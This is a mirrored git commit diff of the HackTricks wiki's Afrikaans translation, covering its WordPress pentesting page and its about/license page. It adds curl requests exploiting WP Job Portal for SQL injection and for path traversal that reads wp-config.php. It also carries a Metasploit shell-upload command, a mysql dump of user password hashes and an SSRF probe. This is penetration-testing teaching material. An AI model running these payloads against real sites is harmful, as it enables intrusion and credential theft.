mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/network-services-pentesting/pentesting-web/wordpress.md
This commit is contained in:
parent
6039ad9744
commit
ef6f1c5468
@ -30,7 +30,7 @@
|
||||
|
||||
**Post eksploitatie**
|
||||
|
||||
- Die `wp-config.php` lêer bevat inligting wat deur WordPress benodig word om met die databasis te verbind, soos die databasisnaam, databasisgasheer, gebruikersnaam en wagwoord, autentikasiesleutels en sout, en die databasis tabelvoorvoegsel. Hierdie konfigurasielêer kan ook gebruik word om DEBUG-modus te aktiveer, wat nuttig kan wees in probleemoplossing.
|
||||
- Die `wp-config.php` lêer bevat inligting wat deur WordPress benodig word om met die databasis te verbind, soos die databasisnaam, databasisgasheer, gebruikersnaam en wagwoord, autentikasiesleutels en sout, en die databasis tabel voorvoegsel. Hierdie konfigurasielêer kan ook gebruik word om DEBUG-modus te aktiveer, wat nuttig kan wees in probleemoplossing.
|
||||
|
||||
### Gebruikers Toestemmings
|
||||
|
||||
@ -38,7 +38,7 @@
|
||||
- **Redakteur**: Publiseer en bestuur sy en ander plasings
|
||||
- **Skrywer**: Publiseer en bestuur sy eie plasings
|
||||
- **Bydraer**: Skryf en bestuur sy plasings maar kan dit nie publiseer nie
|
||||
- **Tekenaar**: Blaai deur plasings en wysig hul profiel
|
||||
- **Tekenaar**: Blaai plasings en wysig hul profiel
|
||||
|
||||
## **Passiewe Enumerasie**
|
||||
|
||||
@ -81,7 +81,7 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
|
||||
|
||||
### Plugins en Temas
|
||||
|
||||
Jy sal waarskynlik nie in staat wees om al die moontlike Plugins en Temas te vind nie. Om al hulle te ontdek, sal jy **aktief 'n lys van Plugins en Temas Brute Force** (hopelik is daar outomatiese gereedskap wat hierdie lyste bevat).
|
||||
Jy sal waarskynlik nie in staat wees om al die moontlike Plugins en Temas te vind nie. Om al hulle te ontdek, sal jy **aktief 'n lys van Plugins en Temas moet Brute Force** (hopelik is daar outomatiese gereedskap wat hierdie lyste bevat).
|
||||
|
||||
### Gebruikers
|
||||
|
||||
@ -211,13 +211,13 @@ Kyk na die gebruik van **`system.multicall`** in die vorige afdeling om te leer
|
||||
|
||||
Hierdie lêer bestaan gewoonlik onder die wortel van die Wordpress-webwerf: **`/wp-cron.php`**\
|
||||
Wanneer hierdie lêer **geaccess** word, word 'n "**zware**" MySQL **query** uitgevoer, so dit kan deur **aanvallers** gebruik word om 'n **DoS** te **veroorsaak**.\
|
||||
Ook, standaard, word die `wp-cron.php` op elke bladsy-laai (wanneer 'n kliënt enige Wordpress-bladsy versoek) aangeroep, wat op hoë-verkeer webwerwe probleme kan veroorsaak (DoS).
|
||||
Ook, standaard, word die `wp-cron.php` op elke bladsy-laai (wanneer 'n kliënt enige Wordpress-bladsy versoek), wat op hoë-verkeer webwerwe probleme kan veroorsaak (DoS).
|
||||
|
||||
Dit word aanbeveel om Wp-Cron te deaktiveer en 'n werklike cronjob binne die gasheer te skep wat die nodige aksies op 'n gereelde interval uitvoer (sonder om probleme te veroorsaak).
|
||||
|
||||
### /wp-json/oembed/1.0/proxy - SSRF
|
||||
|
||||
Probeer om _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ te access en die Wordpress-webwerf mag 'n versoek na jou maak.
|
||||
Probeer om _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ te access en die Wordpress-webwerf mag 'n versoek aan jou maak.
|
||||
|
||||
Dit is die antwoord wanneer dit nie werk nie:
|
||||
|
||||
@ -229,7 +229,7 @@ Dit is die antwoord wanneer dit nie werk nie:
|
||||
https://github.com/t0gu/quickpress/blob/master/core/requests.go
|
||||
{{#endref}}
|
||||
|
||||
Hierdie hulpmiddel kontroleer of die **methodName: pingback.ping** bestaan en vir die pad **/wp-json/oembed/1.0/proxy** en as dit bestaan, probeer dit om dit te exploiteer.
|
||||
Hierdie hulpmiddel kontroleer of die **methodName: pingback.ping** en vir die pad **/wp-json/oembed/1.0/proxy** bestaan, en as dit bestaan, probeer dit om dit te exploiteer.
|
||||
|
||||
## Outomatiese Hulpmiddels
|
||||
```bash
|
||||
@ -258,7 +258,7 @@ Soek op die internet hoe jy toegang kan kry tot daardie opgedateerde bladsy. In
|
||||
|
||||
### MSF
|
||||
|
||||
Jy kan gebruik:
|
||||
Jy kan gebruik maak van:
|
||||
```bash
|
||||
use exploit/unix/webapp/wp_admin_shell_upload
|
||||
```
|
||||
@ -268,7 +268,7 @@ to get a session.
|
||||
|
||||
### PHP plugin
|
||||
|
||||
Dit mag moontlik wees om .php lêers as 'n plugin op te laai.\
|
||||
Dit mag moontlik wees om .php-lêers as 'n plugin op te laai.\
|
||||
Skep jou php backdoor met byvoorbeeld:
|
||||
|
||||
.png>)
|
||||
@ -289,7 +289,7 @@ Waarskynlik sal dit niks doen nie, maar as jy na Media gaan, sal jy jou shell op
|
||||
|
||||
.png>)
|
||||
|
||||
Toegang daartoe en jy sal die URL sien om die reverse shell uit te voer:
|
||||
Toegang daartoe en jy sal die URL sien om die omgekeerde shell uit te voer:
|
||||
|
||||
.png>)
|
||||
|
||||
@ -314,7 +314,7 @@ Die inhoud sluit visuele hulpmiddels in wat die stappe in die WordPress-dashboar
|
||||
## From XSS to RCE
|
||||
|
||||
- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ is 'n skrip wat ontwerp is om 'n **Cross-Site Scripting (XSS)** kwesbaarheid na **Remote Code Execution (RCE)** of ander kritieke kwesbaarhede in WordPress te eskaleer. Vir meer inligting, kyk [**hierdie pos**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Dit bied **ondersteuning vir WordPress weergawes 6.X.X, 5.X.X en 4.X.X. en laat toe om:**
|
||||
- _**Privilegie Eskalasie:**_ Skep 'n gebruiker in WordPress.
|
||||
- _**Privilege Escalation:**_ Skep 'n gebruiker in WordPress.
|
||||
- _**(RCE) Aangepaste Plugin (backdoor) Oplaai:**_ Laai jou aangepaste plugin (backdoor) na WordPress op.
|
||||
- _**(RCE) Ingeboude Plugin Wysig:**_ Wysig 'n Ingeboude Plugin in WordPress.
|
||||
- _**(RCE) Ingeboude Tema Wysig:**_ Wysig 'n Ingeboude Tema in WordPress.
|
||||
@ -322,7 +322,7 @@ Die inhoud sluit visuele hulpmiddels in wat die stappe in die WordPress-dashboar
|
||||
|
||||
## Post Exploitation
|
||||
|
||||
Extract usernames and passwords:
|
||||
Trek gebruikersname en wagwoorde uit:
|
||||
```bash
|
||||
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
|
||||
```
|
||||
@ -338,21 +338,21 @@ Om te weet hoe 'n Wordpress-plugin funksionaliteit kan blootstel, is sleutel om
|
||||
|
||||
- **`wp_ajax`**
|
||||
|
||||
Een van die maniere waarop 'n plugin funksies aan gebruikers kan blootstel, is via AJAX-handlers. Hierdie kan logika, outorisering of verifikasiefoute bevat. Boonop is dit 'n soort van gereeldheid dat hierdie funksies beide die verifikasie en outorisering op die bestaan van 'n wordpress nonce gaan baseer wat **enige gebruiker wat in die Wordpress-instantie geverifieer is, mag hê** (ongeag sy rol).
|
||||
Een van die maniere waarop 'n plugin funksies aan gebruikers kan blootstel, is via AJAX-handlers. Hierdie kan logika, outorisering of verifikasiefoute bevat. Boonop is dit soortgelyk aan die frekwensie dat hierdie funksies beide die verifikasie en outorisering op die bestaan van 'n wordpress nonce gaan baseer wat **enige gebruiker wat in die Wordpress-instantie geverifieer is, mag hê** (ongeag sy rol).
|
||||
|
||||
Dit is die funksies wat gebruik kan word om 'n funksie in 'n plugin bloot te stel:
|
||||
```php
|
||||
add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
|
||||
add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
|
||||
```
|
||||
**Die gebruik van `nopriv` maak die eindpunt toeganklik vir enige gebruikers (selfs nie-geverifieerde nie).**
|
||||
**Die gebruik van `nopriv` maak die eindpunt toeganklik vir enige gebruikers (selfs nie-geverifieerde).**
|
||||
|
||||
> [!CAUTION]
|
||||
> Boonop, as die funksie net die magtiging van die gebruiker met die funksie `wp_verify_nonce` nagaan, dan kyk hierdie funksie net of die gebruiker ingelog is, dit kyk gewoonlik nie na die rol van die gebruiker nie. So lae bevoorregte gebruikers mag toegang hê tot hoë bevoorregte aksies.
|
||||
|
||||
- **REST API**
|
||||
|
||||
Dit is ook moontlik om funksies van WordPress bloot te stel deur 'n REST AP te registreer met die `register_rest_route` funksie:
|
||||
Dit is ook moontlik om funksies van wordpress bloot te stel deur 'n rest AP te registreer met die `register_rest_route` funksie:
|
||||
```php
|
||||
register_rest_route(
|
||||
$this->namespace, '/get/', array(
|
||||
@ -372,13 +372,13 @@ Natuurlik gebruik Wordpress PHP en lêers binne plugins is direk vanaf die web t
|
||||
|
||||
### Ongeauthentiseerde Willekeurige Lêer Verwydering via wp_ajax_nopriv (Litho Tema <= 3.0)
|
||||
|
||||
WordPress temas en plugins stel dikwels AJAX-handelaars bloot deur die `wp_ajax_` en `wp_ajax_nopriv_` haakies. Wanneer die **_nopriv_** variasie gebruik word **word die terugroep bereikbaar deur ongeauthentiseerde besoekers**, so enige sensitiewe aksie moet addisioneel implementeer:
|
||||
WordPress temas en plugins stel dikwels AJAX-handlers bloot deur die `wp_ajax_` en `wp_ajax_nopriv_` haak. Wanneer die **_nopriv_** variasie gebruik word **word die terugroep bereikbaar deur ongeauthentiseerde besoekers**, so enige sensitiewe aksie moet addisioneel implementeer:
|
||||
|
||||
1. 'n **kapasiteitskontrole** (bv. `current_user_can()` of ten minste `is_user_logged_in()`), en
|
||||
2. 'n **CSRF nonce** gevalideer met `check_ajax_referer()` / `wp_verify_nonce()`, en
|
||||
3. **Streng invoer sanitisering / validasie**.
|
||||
|
||||
Die Litho multipurpose tema (< 3.1) het daardie 3 kontroles in die *Verwyder Font Family* kenmerk vergeet en het uiteindelik die volgende kode gestuur (vereenvoudig):
|
||||
Die Litho multipurpose tema (< 3.1) het daardie 3 kontroles in die *Verwyder Font Familie* kenmerk vergeet en het uiteindelik die volgende kode gestuur (vereenvoudig):
|
||||
```php
|
||||
function litho_remove_font_family_action_data() {
|
||||
if ( empty( $_POST['fontfamily'] ) ) {
|
||||
@ -401,7 +401,7 @@ Probleme wat deur hierdie snit ingebring word:
|
||||
|
||||
* **Ongeauthentiseerde toegang** – die `wp_ajax_nopriv_` haak is geregistreer.
|
||||
* **Geen nonce / vermoë kontrole nie** – enige besoeker kan die eindpunt bereik.
|
||||
* **Geen pad sanitisering nie** – die gebruiker-beheerde `fontfamily` string word aan 'n lêerstelsel pad gekonkateneer sonder filtrering, wat klassieke `../../` traversie toelaat.
|
||||
* **Geen pad sanitisering nie** – die gebruiker-beheerde `fontfamily` string word aan 'n lêerstelsel pad gekonnekteer sonder filtrering, wat klassieke `../../` traversie toelaat.
|
||||
|
||||
#### Exploitatie
|
||||
|
||||
@ -418,7 +418,7 @@ Ander impakvolle teikens sluit plugin/tema `.php` lêers in (om sekuriteitsplugi
|
||||
#### Ontdekkingskontrolelys
|
||||
|
||||
* Enige `add_action( 'wp_ajax_nopriv_...')` terugroep wat lêersisteem helpers aanroep (`copy()`, `unlink()`, `$wp_filesystem->delete()`, ens.).
|
||||
* Samevoeging van ongesaniteerde gebruikersinvoer in paaie (soek na `$_POST`, `$_GET`, `$_REQUEST`).
|
||||
* Samevoeging van ongesanitiseerde gebruikersinvoer in paaie (soek na `$_POST`, `$_GET`, `$_REQUEST`).
|
||||
* Afwesigheid van `check_ajax_referer()` en `current_user_can()`/`is_user_logged_in()`.
|
||||
|
||||
#### Versterking
|
||||
@ -470,10 +470,67 @@ Ook, **installeer slegs betroubare WordPress-inproppe en temas**.
|
||||
- Gebruik **sterk wagwoorde** en **2FA**
|
||||
- Periodiek **hersien** gebruikers **toestemmings**
|
||||
- **Beperk aanmeldpogings** om Brute Force-aanvalle te voorkom
|
||||
- Hernoem **`wp-admin.php`** lêer en laat slegs interne toegang toe of vanaf sekere IP-adresse.
|
||||
- Hernoem **`wp-admin.php`** lêer en laat slegs toegang intern of vanaf sekere IP-adresse toe.
|
||||
|
||||
### Ongeoutentiseerde SQL-inspuiting via onvoldoende validasie (WP Job Portal <= 2.3.2)
|
||||
|
||||
Die WP Job Portal werwing-inprop het 'n **savecategory** taak blootgestel wat uiteindelik die volgende kwesbare kode binne `modules/category/model.php::validateFormData()` uitvoer:
|
||||
```php
|
||||
$category = WPJOBPORTALrequest::getVar('parentid');
|
||||
$inquery = ' ';
|
||||
if ($category) {
|
||||
$inquery .= " WHERE parentid = $category "; // <-- direct concat ✗
|
||||
}
|
||||
$query = "SELECT max(ordering)+1 AS maxordering FROM "
|
||||
. wpjobportal::$_db->prefix . "wj_portal_categories " . $inquery; // executed later
|
||||
```
|
||||
Issues introduced by this snippet:
|
||||
|
||||
1. **Ongefilterde gebruikersinvoer** – `parentid` kom regstreeks van die HTTP-versoek.
|
||||
2. **String-konkatenasie binne die WHERE-klausule** – geen `is_numeric()` / `esc_sql()` / voorbereide verklaring.
|
||||
3. **Ongeauthentiseerde bereikbaarheid** – alhoewel die aksie uitgevoer word deur `admin-post.php`, is die enigste kontrole in plek 'n **CSRF nonce** (`wp_verify_nonce()`), wat enige besoeker kan verkry vanaf 'n openbare bladsy wat die shortcode `[wpjobportal_my_resumes]` insluit.
|
||||
|
||||
#### Exploitatie
|
||||
|
||||
1. Kry 'n vars nonce:
|
||||
```bash
|
||||
curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4
|
||||
```
|
||||
2. Spuit arbitrêre SQL deur `parentid` te misbruik:
|
||||
```bash
|
||||
curl -X POST https://victim.com/wp-admin/admin-post.php \
|
||||
-d 'task=savecategory' \
|
||||
-d '_wpnonce=<nonce>' \
|
||||
-d 'parentid=0 OR 1=1-- -' \
|
||||
-d 'cat_title=pwn' -d 'id='
|
||||
```
|
||||
Die antwoord openbaar die resultaat van die ingespotte navraag of verander die databasis, wat SQLi bewys.
|
||||
|
||||
|
||||
### Ongeauthentiseerde Arbitrêre Lêer Aflaai / Pad Traversal (WP Job Portal <= 2.3.2)
|
||||
|
||||
Nog 'n taak, **downloadcustomfile**, het besoekers toegelaat om **enige lêer op skyf** af te laai via pad traversie. Die kwesbare sink is geleë in `modules/customfield/model.php::downloadCustomUploadedFile()`:
|
||||
```php
|
||||
$file = $path . '/' . $file_name;
|
||||
...
|
||||
echo $wp_filesystem->get_contents($file); // raw file output
|
||||
```
|
||||
`$file_name` is aanvaller-beheerde en gekonkatenereer **sonder sanitasie**. Weer eens, die enigste hek is 'n **CSRF nonce** wat van die CV-bladsy afgehaal kan word.
|
||||
|
||||
#### Exploitatie
|
||||
```bash
|
||||
curl -G https://victim.com/wp-admin/admin-post.php \
|
||||
--data-urlencode 'task=downloadcustomfile' \
|
||||
--data-urlencode '_wpnonce=<nonce>' \
|
||||
--data-urlencode 'upload_for=resume' \
|
||||
--data-urlencode 'entity_id=1' \
|
||||
--data-urlencode 'file_name=../../../wp-config.php'
|
||||
```
|
||||
Die bediener antwoord met die inhoud van `wp-config.php`, wat DB-akkrediteer en auth sleutels lek.
|
||||
|
||||
## Verwysings
|
||||
|
||||
- [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
|
||||
- [Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
@ -10,10 +10,10 @@
|
||||
> - Gee **VRYE** toegang tot **OPVOEDKUNDIGE hacking** hulpbronne aan **AL** die Internet.
|
||||
> - Hacking gaan oor leer, en leer moet so vry as moontlik wees.
|
||||
> - Die doel van hierdie boek is om as 'n omvattende **opvoedkundige hulpbron** te dien.
|
||||
> - **BLAAS** wonderlike **hacking** tegnieke wat die gemeenskap publiseer en gee die **ORIGINELE** **SKRYWERS** al die **krediete**.
|
||||
> - **Ons wil nie die krediet van ander mense hê**, ons wil net cool truuks stoor vir almal.
|
||||
> - **BLAAS** wonderlike **hacking** tegnieke wat die gemeenskap publiseer, terwyl die **ORIGINELE** **SKRYWERS** al die **krediete** ontvang.
|
||||
> - **Ons wil nie die krediet van ander mense hê**, ons wil net cool truuks vir almal stoor.
|
||||
> - Ons skryf ook **ons eie navorsings** in HackTricks.
|
||||
> - In verskeie gevalle sal ons net **in HackTricks 'n opsomming van die belangrike dele** van die tegniek skryf en sal ons **die leser aanmoedig om die oorspronklike pos te besoek** vir meer besonderhede.
|
||||
> - In verskeie gevalle sal ons net **in HackTricks 'n opsomming van die belangrike dele** van die tegniek skryf en die **leser aanmoedig om die oorspronklike pos** te besoek vir meer besonderhede.
|
||||
> - **ORGANISEER** al die hacking tegnieke in die boek sodat dit **MEER TOEGANKLIK** is.
|
||||
> - Die HackTricks span het duisende ure gratis gewy **net om die inhoud te organiseer** sodat mense **vinnig kan leer**.
|
||||
|
||||
@ -48,10 +48,10 @@ Ja, jy kan, maar **moet nie vergeet om die spesifieke skakel(s)** waar die inhou
|
||||
|
||||
> [!TIP]
|
||||
>
|
||||
> - **Hoe kan ek 'n bladsy van HackTricks aanhaal?**
|
||||
> - **Hoe kan ek 'n bladsy van HackTricks?**
|
||||
|
||||
Solank as wat die skakel **van** die bladsy(s) waar jy die inligting vandaan geneem het verskyn, is dit genoeg.\
|
||||
As jy 'n bibtex nodig het, kan jy iets soos gebruik:
|
||||
As jy 'n bibtex nodig het, kan jy iets soos:
|
||||
```latex
|
||||
@misc{hacktricks-bibtexing,
|
||||
author = {"HackTricks Team" or the Authors name of the specific page/trick},
|
||||
@ -76,9 +76,9 @@ Die eerste **HackTricks** **waarde** is om **GRATIS** hacking opvoedkundige hulp
|
||||
|
||||
As jy dink HackTricks boeke is gemaak vir **kommersiële doeleindes** is jy **HEELTEMAL VERKEERD**.
|
||||
|
||||
Ons het borge omdat, selfs al is al die inhoud GRATIS, ons wil **die gemeenskap die moontlikheid bied om ons werk te waardeer** as hulle wil. Daarom bied ons mense die opsie om aan HackTricks te skenk via [**Github sponsors**](https://github.com/sponsors/carlospolop), en **relevante kuberveiligheid maatskappye** om HackTricks te borg en om **'n paar advertensies** in die boek te hê, wat die **advertensies** altyd op plekke geplaas word waar hulle **sigbaar** is maar **nie die leer** proses steur as iemand op die inhoud fokus nie.
|
||||
Ons het borge omdat, selfs al is al die inhoud GRATIS, ons wil **die gemeenskap die moontlikheid bied om ons werk te waardeer** as hulle wil. Daarom bied ons mense die opsie om aan HackTricks te skenk via [**Github sponsors**](https://github.com/sponsors/carlospolop), en **relevante kuberveiligheid maatskappye** om HackTricks te borg en om **'n paar advertensies** in die boek te hê, wat altyd geplaas word in plekke waar hulle **sigbaar** is maar **nie die leer** proses steur nie as iemand op die inhoud fokus.
|
||||
|
||||
Jy sal nie HackTricks vol irritante advertensies vind soos ander blogs met baie minder inhoud as HackTricks nie, omdat HackTricks nie vir kommersiële doeleindes gemaak is nie.
|
||||
Jy sal nie HackTricks vol irritante advertensies vind soos ander blogs met baie minder inhoud as HackTricks nie, omdat HackTricks nie gemaak is vir kommersiële doeleindes nie.
|
||||
|
||||
> [!CAUTION]
|
||||
>
|
||||
@ -92,9 +92,9 @@ Jy sal nie HackTricks vol irritante advertensies vind soos ander blogs met baie
|
||||
|
||||
Let daarop dat om skakels na jou bladsy in HackTricks te hê:
|
||||
|
||||
- Jou **SEO** verbeter
|
||||
- Verbeter jou **SEO**
|
||||
- Die inhoud word **vertaal na meer as 15 tale** wat dit moontlik maak vir meer mense om toegang tot hierdie inhoud te hê
|
||||
- **HackTricks moedig** mense aan om **jou bladsy te besoek** (verskeie mense het vir ons genoem dat sedert 'n bladsy van hulle in HackTricks is, hulle meer besoeke ontvang)
|
||||
- **HackTricks moedig** mense aan om **jou bladsy te kyk** (verskeie mense het vir ons genoem dat sedert 'n bladsy van hulle in HackTricks is, hulle meer besoeke ontvang)
|
||||
|
||||
As jy egter steeds wil hê dat die inhoud van jou blog verwyder moet word uit HackTricks, laat weet ons asseblief en ons sal beslis **elke skakel na jou blog verwyder**, en enige inhoud gebaseer daarop.
|
||||
|
||||
@ -111,8 +111,8 @@ Copyright © Alle regte voorbehou tensy anders vermeld.
|
||||
#### License Summary:
|
||||
|
||||
- Attribution: Jy is vry om:
|
||||
- Share — die materiaal in enige medium of formaat te kopieer en te herverdeel.
|
||||
- Adapt — remix, transformeer, en op die materiaal voortbou.
|
||||
- Share — kopieer en versprei die materiaal in enige medium of formaat.
|
||||
- Adapt — remix, transformeer, en bou voort op die materiaal.
|
||||
|
||||
#### Additional Terms:
|
||||
|
||||
@ -125,7 +125,7 @@ Copyright © Alle regte voorbehou tensy anders vermeld.
|
||||
|
||||
Hierdie lisensie gee nie enige handelsmerk of handelsnaam regte in verband met die inhoud nie. Alle handelsmerke en handelsname wat in hierdie blog/boek verskyn, is die eiendom van hul onderskeie eienaars.
|
||||
|
||||
**Deur toegang te verkry tot of HackTricks te gebruik, stem jy in om die bepalings van hierdie lisensie na te kom. As jy nie met hierdie bepalings saamstem nie, asseblief, moenie hierdie webwerf betree nie.**
|
||||
**Deur toegang te verkry tot of HackTricks te gebruik, stem jy in om die bepalings van hierdie lisensie na te kom. As jy nie met hierdie bepalings saamstem nie, asseblief, moenie toegang tot hierdie webwerf verkry nie.**
|
||||
|
||||
## **Disclaimer**
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user